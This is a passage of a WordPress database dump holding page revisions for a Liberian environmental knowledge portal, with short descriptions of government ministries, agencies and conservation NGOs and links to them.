17:50:05','<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2019-11-10 17:50:05','2019-11-10 17:50:05','',1610,'https://ekmsliberia.info/1610-revision-v1/',0,'revision','',0),(1625,1,'2019-11-10 17:51:38','2019-11-10 17:51:38','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>MME Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-10 17:51:38','2019-11-10 17:51:38','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(1626,1,'2019-11-10 17:51:38','2019-11-10 17:51:38','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-10 17:51:38','2019-11-10 17:51:38','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(1627,1,'2019-11-10 17:52:04','2019-11-10 17:52:04','<p>LiMA</p>		\n			<h2>LiMA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-10 17:52:04','2019-11-10 17:52:04','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(1628,1,'2019-11-10 17:52:04','2019-11-10 17:52:04','<p>LiMA</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-10 17:52:04','2019-11-10 17:52:04','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(1629,1,'2019-11-10 17:52:27','2019-11-10 17:52:27','NBC		\n			<h2>NBC Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia National Bureau of Concessions','','inherit','closed','closed','','1604-revision-v1','','','2019-11-10 17:52:27','2019-11-10 17:52:27','',1604,'https://ekmsliberia.info/1604-revision-v1/',0,'revision','',0),(1630,1,'2019-11-10 17:52:27','2019-11-10 17:52:27','<p>Coming up</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia National Bureau of Concessions','','inherit','closed','closed','','1604-revision-v1','','','2019-11-10 17:52:27','2019-11-10 17:52:27','',1604,'https://ekmsliberia.info/1604-revision-v1/',0,'revision','',0),(1631,1,'2019-11-10 17:52:44','2019-11-10 17:52:44','The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.		\n			<h2>LLA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-10 17:52:44','2019-11-10 17:52:44','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(1632,1,'2019-11-10 17:52:44','2019-11-10 17:52:44','The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-10 17:52:44','2019-11-10 17:52:44','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(1633,1,'2019-11-10 17:54:09','2019-11-10 17:54:09','<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p>		\n			<h2>MOA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"document_tag:moa\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-10 17:54:09','2019-11-10 17:54:09','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(1634,1,'2019-11-10 17:54:09','2019-11-10 17:54:09','<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"document_tag:moa\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-10 17:54:09','2019-11-10 17:54:09','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(1635,1,'2019-11-10 17:56:21','2019-11-10 17:56:21','<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.</p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.</p>		\n			<h2>MOT Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Transport','','inherit','closed','closed','','1598-revision-v1','','','2019-11-10 17:56:21','2019-11-10 17:56:21','',1598,'https://ekmsliberia.info/1598-revision-v1/',0,'revision','',0),(1636,1,'2019-11-10 17:56:21','2019-11-10 17:56:21','<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.</p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Transport','','inherit','closed','closed','','1598-revision-v1','','','2019-11-10 17:56:21','2019-11-10 17:56:21','',1598,'https://ekmsliberia.info/1598-revision-v1/',0,'revision','',0),(1637,1,'2019-11-10 17:56:47','2019-11-10 17:56:47','<p>LAA</p>		\n			<h2>LAA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-10 17:56:47','2019-11-10 17:56:47','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(1638,1,'2019-11-10 17:56:47','2019-11-10 17:56:47','<p>Coming up</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-10 17:56:47','2019-11-10 17:56:47','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(1639,1,'2019-11-10 17:57:07','2019-11-10 17:57:07','The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.		\n			<h2>MPW Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-10 17:57:07','2019-11-10 17:57:07','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(1640,1,'2019-11-10 17:57:07','2019-11-10 17:57:07','The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-10 17:57:07','2019-11-10 17:57:07','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(1641,1,'2019-11-10 17:59:09','2019-11-10 17:59:09','<p>Committee on Natural Resource and Environment</p>		\n			<h2>Committee Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2019-11-10 17:59:09','2019-11-10 17:59:09','',1590,'https://ekmsliberia.info/1590-revision-v1/',0,'revision','',0),(1642,1,'2019-11-10 17:59:10','2019-11-10 17:59:10','<p>Coming up</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2019-11-10 17:59:10','2019-11-10 17:59:10','',1590,'https://ekmsliberia.info/1590-revision-v1/',0,'revision','',0),(1643,1,'2019-11-10 17:59:46','2019-11-10 17:59:46','<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p>		\n			<h2>FDA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"document_tag:fda\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-10 17:59:46','2019-11-10 17:59:46','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(1644,1,'2019-11-10 17:59:46','2019-11-10 17:59:46','<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"document_tag:fda\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-10 17:59:46','2019-11-10 17:59:46','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(1645,1,'2019-11-10 18:00:04','2019-11-10 18:00:04','<p>The Mogcsp</p>		\n			<h2>MoGCSP Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2019-11-10 18:00:04','2019-11-10 18:00:04','',1584,'https://ekmsliberia.info/1584-revision-v1/',0,'revision','',0),(1646,1,'2019-11-10 18:00:04','2019-11-10 18:00:04','<p>Coming up</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2019-11-10 18:00:04','2019-11-10 18:00:04','',1584,'https://ekmsliberia.info/1584-revision-v1/',0,'revision','',0),(1647,1,'2019-11-10 18:15:36','2019-11-10 18:15:36','<h2>LISGIS Resources</h2>\n<h2>Departments</h2>\n<h2>Featured Projects</h2>\n<h2>Related Documents</h2>','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-10 18:15:36','2019-11-10 18:15:36','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(1648,1,'2019-11-10 18:15:44','2019-11-10 18:15:44','<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.</p>		\n			<h2>LISGIS Resources</h2>		\n			<h2>Departments</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-10 18:15:44','2019-11-10 18:15:44','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(1649,1,'2019-11-10 18:16:43','2019-11-10 18:16:43','<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-10 18:16:43','2019-11-10 18:16:43','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(1650,1,'2019-11-10 18:19:14','2019-11-10 18:19:14','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>EPA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"document_tag:epa\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-10 18:19:14','2019-11-10 18:19:14','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1651,1,'2019-11-10 18:19:14','2019-11-10 18:19:14','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"document_tag:epa\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-10 18:19:14','2019-11-10 18:19:14','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1652,1,'2019-11-10 18:19:34','2019-11-10 18:19:34','<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and</p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.</p>		\n			<h2>LISGIS Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Institute for Statistics and Geo-Information Services','','inherit','closed','closed','','1544-revision-v1','','','2019-11-10 18:19:34','2019-11-10 18:19:34','',1544,'https://ekmsliberia.info/1544-revision-v1/',0,'revision','',0),(1653,1,'2019-11-10 18:19:34','2019-11-10 18:19:34','<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and</p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Liberia Institute for Statistics and Geo-Information Services','','inherit','closed','closed','','1544-revision-v1','','','2019-11-10 18:19:34','2019-11-10 18:19:34','',1544,'https://ekmsliberia.info/1544-revision-v1/',0,'revision','',0),(1655,1,'2019-11-10 18:31:55','2019-11-10 18:31:55','Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.\r\n\r\nDrawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.\r\n\r\nWe are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.\r\n\r\nRecognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.\r\n\r\nCommunity involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.\r\n\r\nFFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-10 18:31:55','2019-11-10 18:31:55','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(1656,1,'2019-11-10 18:32:44','2019-11-10 18:32:44','As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.\r\n\r\nConservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.\r\n\r\nBuilding upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.\r\n<h2>CI Resources</h2>\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-10 18:32:44','2019-11-10 18:32:44','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(1657,1,'2019-11-10 18:32:55','2019-11-10 18:32:55','The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2019-11-10 18:32:55','2019-11-10 18:32:55','',1610,'https://ekmsliberia.info/1610-revision-v1/',0,'revision','',0),(1658,1,'2019-11-10 18:33:05','2019-11-10 18:33:05','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\r\n\r\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-10 18:33:05','2019-11-10 18:33:05','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(1659,1,'2019-11-10 18:38:07','2019-11-10 18:38:07','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n			<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 18:38:07','2019-11-10 18:38:07','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(1660,1,'2019-11-10 18:38:26','2019-11-10 18:38:26','LiMA\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-10 18:38:26','2019-11-10 18:38:26','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(1661,1,'2019-11-10 18:39:16','2019-11-10 18:39:16','Coming up\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Liberia National Bureau of Concessions','','inherit','closed','closed','','1604-revision-v1','','','2019-11-10 18:39:16','2019-11-10 18:39:16','',1604,'https://ekmsliberia.info/1604-revision-v1/',0,'revision','',0),(1662,1,'2019-11-10 18:39:29','2019-11-10 18:39:29','The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-10 18:39:29','2019-11-10 18:39:29','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(1663,1,'2019-11-10 18:39:39','2019-11-10 18:39:39','The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\" term=\"document_tag:moa\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-10 18:39:39','2019-11-10 18:39:39','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(1664,1,'2019-11-10 18:39:48','2019-11-10 18:39:48','The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.\r\n\r\nThrough its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Ministry of Transport','','inherit','closed','closed','','1598-revision-v1','','','2019-11-10 18:39:48','2019-11-10 18:39:48','',1598,'https://ekmsliberia.info/1598-revision-v1/',0,'revision','',0),(1665,1,'2019-11-10 18:40:30','2019-11-10 18:40:30','Coming up\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2019-11-10 18:40:30','2019-11-10 18:40:30','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(1666,1,'2019-11-10 18:41:32','2019-11-10 18:41:32','The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-10 18:41:32','2019-11-10 18:41:32','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(1667,1,'2019-11-10 18:42:02','2019-11-10 18:42:02','Coming up\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2019-11-10 18:42:02','2019-11-10 18:42:02','',1590,'https://ekmsliberia.info/1590-revision-v1/',0,'revision','',0),(1668,1,'2019-11-10 18:42:11','2019-11-10 18:42:11','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-10 18:42:11','2019-11-10 18:42:11','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(1669,1,'2019-11-10 18:42:28','2019-11-10 18:42:28','The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\" term=\"document_tag:fda\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-10 18:42:28','2019-11-10 18:42:28','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(1670,1,'2019-11-10 18:42:37','2019-11-10 18:42:37','Coming up\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2019-11-10 18:42:37','2019-11-10 18:42:37','',1584,'https://ekmsliberia.info/1584-revision-v1/',0,'revision','',0),(1671,1,'2019-11-10 18:42:52','2019-11-10 18:42:52','The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\" term=\"document_tag:epa\" columns=\"title,excerpt,cf:download_link,tax:document_category\" widths=\"350px,900px,auto,auto\" links=\"terms\" filters=\"false\" rows_per_page=\"5\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-10 18:42:52','2019-11-10 18:42:52','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1672,1,'2019-11-10 18:43:01','2019-11-10 18:43:01','LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and\r\n\r\nMore specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Liberia Institute for Statistics and Geo-Information Services','','inherit','closed','closed','','1544-revision-v1','','','2019-11-10 18:43:01','2019-11-10 